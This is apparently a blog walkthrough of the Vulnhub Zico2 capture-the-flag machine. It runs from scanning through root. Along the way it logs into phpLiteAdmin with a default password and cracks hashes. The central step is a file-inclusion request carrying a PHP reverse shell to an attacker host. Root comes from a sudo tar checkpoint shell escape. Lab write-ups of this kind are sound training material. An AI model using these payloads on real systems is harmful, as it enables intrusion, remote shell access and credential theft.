In this post, I will share how to clear Zico2 machine from Vulnhub.
We need to find an assigned IP address first. So, let’s do a ping sweep and find the IP address.
for i in {1..254} ;do (ping -c 1 192.168.11.$i | grep "bytes from" &) ;done
You may get a different IP address from the one I found.
Port scanning
I checked the IP address. As a next step, I scanned basic ports to see what kind of services were running.
nmap -sC -sV 192.168.11.143
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-02 09:25 JST
Nmap scan report for 192.168.11.143
Host is up (0.0023s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 68:60:de:c2:2b:c6:16:d8:5b:88:be:e3:cc:a1:25:75 (DSA)
| 2048 50:db:75:ba:11:2f:43:c9:ab:14:40:6d:7f:a1:ee:e3 (RSA)
|_ 256 11:5d:55:29:8a:77:d8:08:b4:00:9b:a3:61:93:fe:e5 (ECDSA)
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
|_http-title: Zico's Shop
|_http-server-header: Apache/2.2.22 (Ubuntu)
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 37434/udp6 status
| 100024 1 50232/tcp6 status
| 100024 1 55865/tcp status
|_ 100024 1 59117/udp statusOk, 3 ports are open.
I inspected the web server first.
Since there wasn’t any useful information on the default page, I enumerated directories to see if there were any important ones.
Directory enumeration
I used gobuster.
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.htaccess (Status: 403) [Size: 291]
/.hta (Status: 403) [Size: 286]
/.htpasswd (Status: 403) [Size: 291]
/cgi-bin/ (Status: 403) [Size: 290]
/css (Status: 301) [Size: 314] [--> http://192.168.11.143/css/]
/dbadmin (Status: 301) [Size: 318] [--> http://192.168.11.143/dbadmin/]
/img (Status: 301) [Size: 314] [--> http://192.168.11.143/img/]
/index.html (Status: 200) [Size: 7970]
/index (Status: 200) [Size: 7970]
/js (Status: 301) [Size: 313] [--> http://192.168.11.143/js/]
/LICENSE (Status: 200) [Size: 1094]
/package (Status: 200) [Size: 789]
/server-status (Status: 403) [Size: 295]
/tools (Status: 200) [Size: 8355]
/vendor (Status: 301) [Size: 317] [--> http://192.168.11.143/vendor/]
/view (Status: 200) [Size: 0]It hit many directories.
The directory called dbadmin looks interesting. I went to the page.
Then, the login page appeared.
It requires a password. I searched for if there are default credentials for phpLiteAdmin.
The search result said the default password is “admin”.
I managed to log in and could see some interesting information.
There were two credentials for root and zico.
The passwords seem MD5 hashes. I decrypted them and got the following results.
zico2215@ and 34kroot34.
So easy?!
phpLiteAdmin v1.9.3
It went so smoothly until getting the user credentials, however, the credentials were useless.
I tried ssh connection using the credentials and it didn’t work.
Maybe I need to find another way around it.
I searched for vulnerabilities in phpLiteAdmin v1.9.3. (By the way, the version is displayed on the login page)
I came across the vulnerability used in another CTF challenge.
The vulnerability allows us to use a reverse shell by creating a database containing an arbitrary script.
In the image above, I created the database called hack.php.
In the database, I created a table called try and added a malicious value in the default value.
Now I’m ready for the attack. The rest of the thing is to access the directory of the database and execute the command.
Of course, because we use an address bar, it should be URL encoded.
192.168.11.143/view.php?page=tools.html../../../../..//usr/databases/hack.php&cmd=php+-r+'%24sock%3Dfsockopen("192.168.11.128"%2C4444)%3Bexec("%2Fbin%2Fsh+-i+<%263+>%263+2>%263")%3B';
Then, we are connected!
User flag
The user of the shell we obtained is www-data.
Let’s check if we can escalate privileges.
-rw-r--r-- 1 zico zico 2831 Jun 19 2017 /home/zico/wordpress/wp-config.php
define('DB_NAME', 'zico');
define('DB_USER', 'zico');
define('DB_PASSWORD', 'sWfCsfJSPV9H3AmQzw8');
define('DB_HOST', 'zico');I found the password for zico from the WordPress config file.
If you are looking for an easy way for information gathering, I recommend using linpeas.
I used the su command using the found password.
zico@zico:/tmp$ whoami
whoami
zicoRoot flag
We have one more step to go.
To get root permission, I checked the list of sudo commands that zico can use.
zico@zico:~$ sudo -l
Matching Defaults entries for zico on this host:
env_reset, exempt_group=admin, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User zico may run the following commands on this host:
(root) NOPASSWD: /bin/tar
(root) NOPASSWD: /usr/bin/zipIt says tar and zip can be run with the sudo command.
I always check gtfobins if they have relevant information and they have.
sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
I tried the command and successfully became root.
flag.txt
# cat flag.txt
#
#
#
# ROOOOT!
# You did it! Congratz!
#
# Hope you enjoyed!
#
#
#
#This is the end of the machine.
I hope you enjoyed it.
Thanks.
